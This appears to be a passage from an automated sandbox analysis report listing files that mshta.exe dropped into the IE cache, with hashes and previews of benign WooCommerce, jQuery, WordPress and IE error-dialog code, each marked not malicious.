                                                                                                                                                                                                      SHA-256:849D84CFB71A66AB93451B40DDBE4419A6034D7C90B0CF15D6EF9D5A4117F26E
                                                                                                                                                                                                      SHA-512:10DC02BB9E1D025A19807568939E37BCD96272FDB33CF08348CD1CFDE3C7E49CBC3264F2EA332D7417AA976FBE497F7013397AB7FC0788087F48A76E79D6CA6E
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_text_search_container .woof_text_search_go{. display: block;. width: 20px;. height: 20px;. margin-left: 3px;. background: url("../img/magnifying-glass2.svg");. display: none;. border: none !important;. text-decoration: none !important;. position: absolute;. right: 5px;. top: 5px;. z-index: 98;.}..woof_text_search_container .woof_container_inner{. position: relative;.}..woof_husky_txt{. width: 100%;. display: block;. height: auto;. position: relative;. margin-top: -1px;.}...woof_husky_txt-input{. width: 100%;. min-height: 30px;. /* background: #fff;. color: #777; */. margin-bottom: 0 !important;.}...woof_husky_txt-container{. font-family: sans-serif;. background: rgb(238, 238, 238);. border-radius: 2px;. border: solid 1px #eee;.. padding: 0;. width: inherit;. min-height: 1px;. max-height: 1px;. overflow: hidden;. position: absolute;. width: 100%;. z-index: 9999;. /* cursor:

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jquery.min[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):89684
                                                                                                                                                                                                      Entropy (8bit):5.290619806745655
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:SjjxXUHJnxDjoXEZxkMV4PYDt0zxxf6gP3f8cApoEGOzZTBvUsuy8WnKdXwhLQv1:SdeIygP3fulzcsz8jlvaDioQ47GKK
                                                                                                                                                                                                      MD5:17738318D61D394F1DE8890D589AFAEC
                                                                                                                                                                                                      SHA1:F6D0C4DC1399CF02D53F5753AD46573A8BBC2AC3
                                                                                                                                                                                                      SHA-256:CC7403BAB52ED166E24EA9324241045AF370BE482F5B594468F4A6AC6E7E7981
                                                                                                                                                                                                      SHA-512:242FFC23ED47553221460F601CB56C507E52A163E46AB9C89C3E39AB933A54FD326B2134D3E831DF7F32614329775A0C600F63BF54F4C5B8994F090C5FBA156F
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\select_radio_check[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3138
                                                                                                                                                                                                      Entropy (8bit):4.845003631518894
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:30503s0jRBnKwGvhazIscTBdTz1YrpTVJnqF5ZBkJUvrNJ6TN8LU:k503s0jvKNpaBcT3arpDqF5Zqco6LU
                                                                                                                                                                                                      MD5:F821E43916EBD30DB5D2B3AE8972DDE6
                                                                                                                                                                                                      SHA1:78C66310A2501EE5F163200B6A23CC6233E33A93
                                                                                                                                                                                                      SHA-256:3627B01B44AD8B0E399F94E27359DB86E430B5F758E4550BD1004F442F81106F
                                                                                                                                                                                                      SHA-512:B8A5737041769885BB69089199491A2641A17ED3C717682E1DCA5D32FB45020F73019882D68D949828959E7D3C6AE4281B0F80605BC949F4E3DEF98C7383B155
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:/* http://codepen.io/elmahdim/pen/hlmri */.dl.woof_select_radio_check{. margin: 0 !important;.}....woof_select_radio_check dd,..woof_select_radio_check dt {. margin: 0px;. padding: 0px;.}...woof_select_radio_check ul {. margin: -1px 0 0 0;.}...woof_select_radio_check dd {. position: relative;.}...woof_select_radio_check a,..woof_select_radio_check a:visited {. color: #839b05;. text-decoration: none;. outline: none;. font-size: 12px;.}...woof_select_radio_check dt a {. background-color: #fff;. color: #424035 !important;. display: block;. padding: 5px 15px 5px 7px;. line-height: 18px;. overflow: hidden;. border: solid 1px #eee;. border-radius: 2px;.}...woof_select_radio_check dt.woof_select_radio_check_opened a {. background-color: #477bff;. color: #fff !important;. border: solid 1px #fff;.}...woof_multiSel{. margin-bottom: 0 !important;.}...woof_select_radio_check dt a span,..woof_multiSel span {. cursor: pointer;. dis

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\site_main[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9679
                                                                                                                                                                                                      Entropy (8bit):3.5740520228025834
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:BFRQoECFMGECL2l6okilou4hGkipOCNdOSvoedcZfwLIAD2Viey2:KovMGC6ovB4hGnjcS2x
                                                                                                                                                                                                      MD5:7237A842DF6FF90E7D924E9493D49796
                                                                                                                                                                                                      SHA1:2B5FF1EC857FEF073ADC6D370C467CE5B1ABFA25
                                                                                                                                                                                                      SHA-256:9D58BE93D455EB9E641052F86B28D51A1C47C3283679FD12E5EC457CF2F40161
                                                                                                                                                                                                      SHA-512:D7AB351519B55E5788A60A96AF0605EC60D81DCF0506B2187611773AB3696997E8F5754CE6FB2DA2784C5A9712FF00F30804FD7C035916158A51DE52DCA8B283
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:(function ($) {. /**. * refresh cart when payment method changed. */. if (awdr_params.refresh_order_review == '1') {. $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', function () {. refreshCart();. });.. /**. * refresh cart when Email changed. */. $(document).on('blur', 'input[name="billing_email"], select#billing_state', function () {. refreshCart();. });. }.. function refreshCart() {. $('body').trigger('update_checkout');. }.. $(document).ready(function ($) {. function init_events() {. if (awdr_params.enable_update_price_with_qty == 'show_dynamically') {. $(document).on('change', '[name="quantity"]', function (){. var awdr_qty_object = $(this);. setTimeout(function(){. var $qty = awdr_qty_object.val();.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\by_author[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):163
                                                                                                                                                                                                      Entropy (8bit):4.479414044196935
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:lPnJMelF+dcMoCJ+bRJpmMo7cmKY6PeTv1oCVo62nTo7n:pCwF+dToCqReMoQpeTv1oCOzo7
                                                                                                                                                                                                      MD5:B1659E76506F38E0B7B3A02016C30508
                                                                                                                                                                                                      SHA1:D7DDC9D8CC5385AEB75E90CD0E052DCE2D0D2517
                                                                                                                                                                                                      SHA-256:01B17E190F4E0FAECD59F2A30B4760B083A27B5546BA0672C6586D7C99531DD5
                                                                                                                                                                                                      SHA-512:6ACB2FE99DA953194B8EADCD03EE0861A2E822D2F1BF2BB36F1E6FCDAD7A59F9C21F31D307654F565C9E16905AEA16F81F8CD55A55421A63D0D2318629C4346A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_authors li{. margin-top:7px !important;. list-style-type: none !important;.}..ul.woof_authors{. margin: 0 !important;. padding: 0 !important;.}..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\classic-themes.min[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):217
                                                                                                                                                                                                      Entropy (8bit):5.1508709451178865
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:6:UhC6j/7NKZTRYrtH3ERAT8wEggqgq/wl/q:Uz77NdG4Cqcl/q
                                                                                                                                                                                                      MD5:95E891F28E44A9B314C09545D86BE2B7
                                                                                                                                                                                                      SHA1:F9B13A8BD47273B086A0A07DF15F314E0AF0BC3E
                                                                                                                                                                                                      SHA-256:5A5F39391FBF5B06DB84B8F9716D53DE575EE97A627D2C5F12F79A991A671EB5
                                                                                                                                                                                                      SHA-512:105947A192EC19166AB0D106A357BAC3C4DF7FCF575E4BEFA3002F0F032F80056CABF3AF085DE1F27B177243F7053D624059C7389E90259B9A62D745CBC19289
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:/*! This file is auto-generated */..wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\error[1]

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1706
                                                                                                                                                                                                      Entropy (8bit):5.274543201400288
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:NIAbzyYh8rRLkRVNaktqavP61GJZoF+SMy:xWqxztqaHO
                                                                                                                                                                                                      MD5:B9BEC45642FF7A2588DC6CB4131EA833
                                                                                                                                                                                                      SHA1:4D150A53276C9B72457AE35320187A3C45F2F021
                                                                                                                                                                                                      SHA-256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
                                                                                                                                                                                                      SHA-512:C119F5625F1FC2BCDB20EE87E51FC73B31F130094947AC728636451C46DCED7B30954A059B24FEF99E1DB434581FD9E830ABCEB30D013404AAC4A7BB1186AD3A
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...window.onerror = HandleError..function HandleError(message, url, line)..{..var str = L_Dialog_ErrorMessage + "\n\n"..+ L_ErrorNumber_Text + line + "\n"..+ message;..alert (str);..window.close();..return true;..}..function loadBdy()..{..var objOptions = window.dialogArguments;..btnNo.onclick = new Function("btnOKClick()");..btnNo.onkeydown = new Function("SwitchFocus()");..btnYes.onclick = new Function("btnYesClick()");..btnYes.onkeydown = new Function("SwitchFocus()");..document.onkeypress = new Function("docKeypress()");..spnLine.innerText = objOptions.getAttribute("errorLine");..spnCharacter.innerText = objOptions.getAttribute("errorCharacter");..spnError.innerText = objOptions.getAttribute("errorMessage");..spnCode.innerText = objOptions.getAttribute("errorCode");..txaURL.innerText = objOptions.getAttribute("errorUrl");..if (objOptions.errorDebug)..{..divDebug.innerText = L_ContinueScript_Message;..}..btnYes.focus();..}..function SwitchFocus()..{..var HTML_KEY_ARROWLEFT = 37;..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\front[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):483
                                                                                                                                                                                                      Entropy (8bit):4.579362963972393
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:12:YEc1tbaLTTJtWcvtVwkctscvTxmtYLMgfBtefjo2Wcd:ItbaLTdtNlVwpt/NmtoJtEo+
                                                                                                                                                                                                      MD5:19B11476F82CF3193C6F110B2D6492A9
                                                                                                                                                                                                      SHA1:A2809C952F3427460F0DB3A35797233E3CC39455
                                                                                                                                                                                                      SHA-256:AF757130511C89FBD953546E53CE3D3DFA9F21C674B81F77B72D0EBFAE872533
                                                                                                                                                                                                      SHA-512:0FFF452A8643F2BA62AB5D983668BD08ADD783823C4C1E45CF4E22822500619DF7E37FDF2CD8696F98C89504BBE1BDB5E0DAB3A939EC2E198A7E3E50C1A8DCDB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_list_sd .woof_open_hidden_li{. width: 100%;.}...woof-sd-ie .woof-sd-ie-count:empty{. display: none !important;.}...woof-sd-ie .woof-sd-list-opener{. line-height: 0;. position: relative;. top: -1px;.}...woof-sd-ie woof-sd-list-opener{. top: -2px;. position: relative;.}...woof-sd-ie .woof_childs_list_opener span{. width: 18px;. height: 18px;.}...woof-sd-ie .woof_radio_term_reset_visible{. position: absolute;. right: -9px;. top: -11px;.}...

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\gtm4wp-contact-form-7-tracker[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):891
                                                                                                                                                                                                      Entropy (8bit):5.005287833752577
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:zrgSxFWNO661S9goFMhYK376QgoFMYOnRrjNd9W:Zx4A66ob076Qb2nR/b9W
                                                                                                                                                                                                      MD5:896AA74695421759DE3F05A1AC46B4B1
                                                                                                                                                                                                      SHA1:4648CA7E1CABF2F952D6EE68431F54A14571E552
                                                                                                                                                                                                      SHA-256:9FBA7D93DD3ACEF0467892543BA93147B67CF105757CA84108FE3DD63DE4C4C5
                                                                                                                                                                                                      SHA-512:391D329BD2CA785D9109A5EA6EAF04578F3F39B58A17B58611A9ED7F84F0CCB12352B83120BFD83DAA8468906718DEACFE10975CF8278899EECC3444469AFA07
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:jQuery( function() {...jQuery( ".wpcf7" ).....on( 'wpcf7mailsent', function( e ) {.....var gtm4wp_cf7formid = '(not set)';.....if ( e && e.detail && e.detail.contactFormId ) {......gtm4wp_cf7formid = e.detail.contactFormId;.....} else if ( e && e.originalEvent && e.originalEvent.detail && e.originalEvent.detail.contactFormId ) {......gtm4wp_cf7formid = e.originalEvent.detail.contactFormId;.....}.......var gtm4wp_cf7forminputs = [];.....if ( e && e.detail && e.detail.inputs ) {......gtm4wp_cf7forminputs = e.detail.inputs;.....} else if ( e && e.originalEvent && e.originalEvent.detail && e.originalEvent.detail.inputs ) {......gtm4wp_cf7forminputs = e.originalEvent.detail.inputs;.....}.......window[ gtm4wp_datalayer_name ].push({......'event': 'gtm4wp.contactForm7Submitted',......'gtm4wp.cf7formid': gtm4wp_cf7formid,......'gtm4wp.cf7inputs': gtm4wp_cf7forminputs.....});....});..});

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\husky[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:C++ source, ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):16030
                                                                                                                                                                                                      Entropy (8bit):4.051685215025106
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:W0ke5apcLdPUYUbXneMr9of788Lsau540TeKlZJUAs50BtrucvxSiIyhWXi+dMBP:oeoWHUbXvrogasaETeMTSMWST
                                                                                                                                                                                                      MD5:CD16E3D0613A69792979AA54E0CE6177
                                                                                                                                                                                                      SHA1:631115C445B1098B2A58CC7D7F584051B3A40863
                                                                                                                                                                                                      SHA-256:AF3BC439B22149AC67FA17035CE971D9DA6F741985E19151B2057F4DCCACA319
                                                                                                                                                                                                      SHA-512:51761C601AF3FDD7ABEC95FD7FA6D0C66D4A93ECA3451C355BCA1DE04A9D15BBF6A8B066E7BACE5C9DA458A2D0D24BB859BA5ADC1BAC29C357A472DE9A38BCBB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:'use strict';..class HuskyText {. constructor(input, data = {}) {. this.searched_value = '';. this.current_page = 0;. this.data = Object.assign({}, data);. this.input = input;. this.init_input();. this.container = document.createElement('div');. this.container.className = 'woof_husky_txt';. this.input.insertAdjacentElement('afterend', this.container);.. this.fetch_timer = null;. this.fetch_controller = null;.. document.addEventListener('click', ev => {. if (ev.target !== this.input) {. this._show(false);. }. });. }.. init_input() {.. Object.keys(this.data).forEach((marker) => {. if (this.input.hasAttribute(`data-${marker}`)) {. this.data[marker] = this.input.getAttribute(`data-${marker}`);. }. });.. this.input.value = this.data.s;. if (!this.input.classList.contains('woof_husky_txt-input')) {.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\quick_search[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):4701
                                                                                                                                                                                                      Entropy (8bit):4.845634335865973
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:WB37WJTsD8XHVCNmMK1r4awwF7acYvaHWDFl2FJmzecjgc+roxZEFyF5GB:W90I0VCNmMK187wF7acYCHWDmFJzJpSu
                                                                                                                                                                                                      MD5:2BD8B16C0FA875A954507C9BAF9F5D2C
                                                                                                                                                                                                      SHA1:4DA3759AD67F8CDA6B22B9CC6ED154AC48CC78BB
                                                                                                                                                                                                      SHA-256:E05898D46696CD63B11C807D05759CE7EF44156135D194BC46F923713F50F7B3
                                                                                                                                                                                                      SHA-512:177367D6AAB5A34CAA406CC7B740F915F694A7BA23DEA5458EF569733EADB58FE9DCF56613CEBBF32EF0781EF0184B628B46F1BCD38AAE7608AB713B1E8DF462
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_quick_search_wraper .easy-autocomplete{. width: 100% !important;.}..woof_quick_search_wraper input#woof_quick_search_form{. width: 100%;. min-width: 250px;.}..woof_qt_key_words{. line-height: initial;.}..easy-autocomplete-container .woof_quick_search_desc{. display: inline-block;. vertical-align: top;. width: calc(100% - 70px);. padding-left: 15px;. max-height: 70px;. overflow: hidden;. transition: max-height 0.7s ease-in-out;.}..easy-autocomplete-container .woof_quick_search_img{. display: inline-block;. margin-top: 10px;. width:50px;. height: 50px;.}..woof_quick_search_desc_title{. font-weight: bold;. line-height: initial;. margin-bottom: 20px;.}..easy-autocomplete-container .woof_quick_search_desc:hover {. max-height: 200px;.}./*additional filters*/..woof_qt_item_container{. display: block;. margin-left: 0;. min-width: 80px;.}..woof_qt_radio_reset{. visibility: hidden;.}.div.checked + label .woof_qt_radio_res

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\radio[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):9373
                                                                                                                                                                                                      Entropy (8bit):4.700452000634185
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:192:FQjHDwAReCwQng7IdvaeeBoRtE53wyFKd9R8:FQxEhKd9K
                                                                                                                                                                                                      MD5:060DF3EBD0E2F510078B7AD314F23392
                                                                                                                                                                                                      SHA1:93F2663AFB0D4BC2B8009C275F5FBBC6D2F98977
                                                                                                                                                                                                      SHA-256:42A3E44E8259E2CEE8F5853D133FAADCDC8C4D0D6A871EDA9C9C7462C799CFD1
                                                                                                                                                                                                      SHA-512:C34E3172A972750DF2186BEF0C56CAEAD50CA5D5233CD57F4563DAC832BA6D730DC0258A8BFBF59A0F492C10EC38D94720B0A405D23C69C129ECB2917C7AFF14
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview::root {. --woof-sd-ie-rad_width: 25px;. --woof-sd-ie-rad_height: 25px;.. --woof-sd-ie-rad_space: 1px;. --woof-sd-ie-rad_space_color: #ffffff;.. --woof-sd-ie-rad_text_top: 0;. --woof-sd-ie-rad_text_color: #6d6d6d;. --woof-sd-ie-rad_hover_text_color: #333333;. --woof-sd-ie-rad_selected_text_color: #000000;. --woof-sd-ie-rad_font_size: 14px;. --woof-sd-ie-rad_font_family: inherit;. --woof-sd-ie-rad_font_weight: 400;. --woof-sd-ie-rad_hover_font_weight: 400;. --woof-sd-ie-rad_selected_font_weight: 400;. --woof-sd-ie-rad_line_height: 18px;... --woof-sd-ie-rad_color: #ffffff;. --woof-sd-ie-rad_hover_color: #79b8ff;. --woof-sd-ie-rad_selected_color: #79b8ff;. --woof-sd-ie-rad_image: url();. --woof-sd-ie-rad_selected_image: url();. --woof-sd-ie-rad_hover_image: url();. --woof-sd-ie-rad_hover_scale: 100;. --woof-sd-ie-rad_selected_scale: 100;.. --woof-sd-ie-rad_border_radius: 50%;. --woof-sd-ie-rad_border_width: 1px;. --

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\awdr_pro[1].js

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1969
                                                                                                                                                                                                      Entropy (8bit):4.138257995382343
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:NXRq+M1i64MwMMw4Mojr/FlFAiSRwQsQh9igscgsDiuk:NM+dXMF4RXmiSmQDh9i8iuk
                                                                                                                                                                                                      MD5:F4B3CFD8A8AE7BC745695971004BD432
                                                                                                                                                                                                      SHA1:56BCC845FADDB4BB24BB4B361FFCE49BB2803977
                                                                                                                                                                                                      SHA-256:CE62B634712417BD24F7B23DA37D2EE5A291ED7452EB9E47384D4F15537F03E7
                                                                                                                                                                                                      SHA-512:CD3B45C9FDDD09CEA5567E27B6ECF3B855345E7AB57C3CC93374BFCA3765576A91793E1402C99357564D44FC0107D5D75C360FCC110337416904E89D9F5EC748
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:/* global jQuery, ajaxurl, wdr_data */.(function ($) {. $(document).ready(function () {. $(document).on("click", ".awdr_change_product", function() {. var product_id = $(this).attr('data-pid');. var rule_unique_id = $(this).attr('data-rule_id');. var parent_id = $(this).attr('data-parent_id');.. var data = {. action: 'awdr_change_discount_product_in_cart',. product_id: product_id,. rule_unique_id: rule_unique_id,. parent_id: parent_id,. awdr_nonce: awdr_params.nonce,. };. $.ajax({. url: awdr_params.ajaxurl,. data: data,. type: 'POST',. success: function (response) {. if(response.success == true){. if(response.data == 1){. jQuery("[name='update_cart']").removeAttr('disabled');. jQuery(

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\by_instock[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                      Entropy (8bit):4.508263568166706
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:l4GiM0XwHRp8Y3:jiM/+Y3
                                                                                                                                                                                                      MD5:42ADACE676F5AABC801213B68DD2F459
                                                                                                                                                                                                      SHA1:79676A1B58DDFBDC18EDED38B5FD608B4AA9A81F
                                                                                                                                                                                                      SHA-256:C277FE3B68AD507BA99939F981BAAC6ADE7850FABDAAFF0ACE5334C5A8268700
                                                                                                                                                                                                      SHA-512:41754E6D9D8A5EA882C22BDA32C9F717433F2ECA7DCC09C9FC50F4EB096A1221202C7DCBE0927D792AB93BB74BE172F19EC932B8DFE085A6F39F493DE8BF4BDB
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_checkbox_instock_container{. margin-bottom: 4px;.}..

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\by_onsales[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                      Entropy (8bit):4.610982286239398
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:lD5Gl0XwHRp8Yn:c/+Yn
                                                                                                                                                                                                      MD5:CF3A71F4F059554809A6C493EDAB94B3
                                                                                                                                                                                                      SHA1:9E60E866175163112070257AEE5019A825C8A024
                                                                                                                                                                                                      SHA-256:46C9EB24D0DF1F5EBCC4885F9B7EEDC7DE9998FD9052116B25A5F0FD2A90BC97
                                                                                                                                                                                                      SHA-512:12A055D8E6BC0B359D2A4A572C81A184A96FE3E41914E72E6CEBEFF6B01C11ADF343069438D1F1D6C5014FFE0366ABB2E4F3A57DA243C38A08A1A81EA0CE8E86
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:.woof_checkbox_sales_container{. margin-bottom: 4px;.}

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):3249
                                                                                                                                                                                                      Entropy (8bit):5.4598794938059125
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:96:vKFrZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:CGpv+GkduSDl6LRa
                                                                                                                                                                                                      MD5:939A9FBD880F8B22D4CDD65B7324C6DB
                                                                                                                                                                                                      SHA1:62167D495B0993DD0396056B814ABAE415A996EE
                                                                                                                                                                                                      SHA-256:156E7226C757414F8FD450E28E19D0A404FDBA2571425B203FDC9C185CF7FF0E
                                                                                                                                                                                                      SHA-512:91428FFA2A79F3D05EBDB19ED7F6490A4CEE788DF709AB32E2CDC06AEC948CDCCCDAEBF12555BE4AD315234D30F44C477823A2592258E12D77091FA01308197B
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialogue.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonfa

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\styles[1].css

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):2859
                                                                                                                                                                                                      Entropy (8bit):5.128976775297061
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkwEv4Hm6Hid:HC+2/Vpb/flue1pFwEv4Hmo0
                                                                                                                                                                                                      MD5:0E4A098F3F6E3FAEDE64DB8B9DA80BA2
                                                                                                                                                                                                      SHA1:65B9B3C849F3FBDD783DDBFB183616FF55C7EE53
                                                                                                                                                                                                      SHA-256:AB21762C3F447AA08CBEFD5EA3866165F925BD5058A9AE19E23721462DE6FB60
